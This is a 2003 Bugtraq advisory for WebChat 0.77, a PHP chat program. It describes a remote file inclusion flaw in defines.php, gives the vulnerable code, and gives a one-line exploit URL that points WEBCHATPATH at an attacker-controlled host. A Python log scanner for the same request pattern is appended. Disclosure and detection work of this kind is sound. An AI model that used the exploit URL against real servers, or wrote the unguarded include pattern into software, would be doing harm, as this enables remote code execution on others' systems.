Bugtraq: WebChat (PHP)

WebChat (PHP)

From: Frog Man <leseulfrog_at_hotmail.com>
Date: Mon, 03 Mar 2003 13:57:43 +0100

Information :
°°°°°°°°°°°°°
Version : 0.77
Website : http://www.webdev.ro
Problem : File Inclusion

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
defines.php :
-----------------------------------------------
<?
if (!isset($WEBCHATPATH)) {
         $WEBCHATPATH = './';
}
include ($WEBCHATPATH.'db_mysql.php');
include ($WEBCHATPATH.'language/english.php');
[...]
-----------------------------------------------

Exploits :
°°°°°°°°°°
http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
with :
http://[attacker]/db_mysql.php and
http://[attacker]/language/english.php

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (-> New Version !! :))

More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/WebChat.txt

frog-m_at_n

Received on Mar 03 2003
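
Added example (not part of the original post or of WebChat): a log check for the request pattern the advisory describes, where WEBCHATPATH is supplied in the query string. It goes beyond the single case above by flagging any parameter whose decoded value begins with scheme://. The Apache combined log format, the /chat/ path and all addresses are assumptions constructed for the sample.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines (Apache combined log format, /chat/ path assumed).
SAMPLE_LOG = """\
192.0.2.10 - - [03/Mar/2003:14:02:11 +0100] "GET /chat/defines.php?WEBCHATPATH=http://203.0.113.5/ HTTP/1.0" 200 512 "-" "-"
192.0.2.11 - - [03/Mar/2003:14:03:40 +0100] "GET /chat/index.php?room=1 HTTP/1.0" 200 2048 "-" "-"
192.0.2.12 - - [03/Mar/2003:14:05:02 +0100] "GET /chat/defines.php?WEBCHATPATH=hTTp%3A%2F%2F203.0.113.5%2F HTTP/1.0" 200 512 "-" "-"
192.0.2.13 - - [03/Mar/2003:14:06:19 +0100] "POST /chat/login.php?next=/chat/index.php HTTP/1.0" 302 0 "-" "-"
192.0.2.14 - - [03/Mar/2003:14:07:55 +0100] "GET /chat/defines.php?WEBCHATPATH=../ HTTP/1.0" 200 512 "-" "-"
"""

# client, method and request target from one combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*"')
# a parameter value that starts with a URL scheme (http://, ftp://, ...)
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)


def find_inclusion_attempts(log_text, watched_params=("WEBCHATPATH",)):
    """Return (client, path, param, value, reason) for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, _method, target = m.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value)  # second decode catches double encoding
            if REMOTE_RE.match(value):
                reason = "remote-url-value"
            elif name in watched_params:
                # the include path should never arrive from the client at all
                reason = "include-path-override"
            else:
                continue
            hits.append((client, parts.path, name, value, reason))
    return hits


if __name__ == "__main__":
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print(*hit, sep="\t")
```
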
